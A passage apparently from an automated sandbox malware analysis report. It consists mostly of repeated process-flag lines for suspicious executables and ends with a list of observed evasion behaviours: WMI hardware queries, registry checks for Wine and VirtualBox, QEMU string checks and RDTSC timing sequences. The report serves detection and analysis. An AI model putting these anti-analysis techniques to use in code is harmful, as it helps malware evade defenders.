Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE`,
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE@\
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEA6B second address: BBEA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBEA71 second address: BBEA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F99D0DE6F26h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30877 second address: D30885 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99D0D12E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30885 second address: D30889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D30889 second address: D30897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F99D0D12E16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49FF9 second address: D49FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
